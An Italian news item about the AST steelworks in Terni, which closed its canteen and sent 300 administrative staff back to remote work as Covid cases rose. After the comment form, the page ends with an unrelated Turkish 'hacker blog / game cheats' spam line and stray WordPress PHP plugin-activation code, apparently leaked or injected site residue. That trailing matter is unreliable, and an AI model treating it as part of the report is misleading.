Terni, all’Ast 300 impiegati lavorano da casa. E chiude la mensa aziendale per l’emergenza Covid – Corriere dell’Umbria



A Terni chiudono da mercoledì 28 ottobre, all’Ast, la mensa e i distributori automatici e scatta nuovamente lo smartworking per 300 impiegati amministrativi, tra impiegati e quadri, circa il 50 per cento della forza lavoro dei cosiddetti colletti bianchi. Ritornano le restrizioni, dunque, in relazione all’acuirsi della pandemia. I delegati della Rsu si sono incontrati con i rappresentanti della direzione aziendale in merito alle azioni da porre in essere nello stabilimento di viale Brin, al Tubificio della zona industriale di Sabbione e al Centro di finitura di vocabolo Pantano. Acciai speciali Terni fa sapere di “avere adottato altre misure a fronte del recente aggravarsi della situazione sanitaria nel territorio, con il contributo delle rappresentanze dei lavoratori e nell’ambito del comitato tra Rsu e azienda istituito in linea con il quadro normativo di riferimento”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );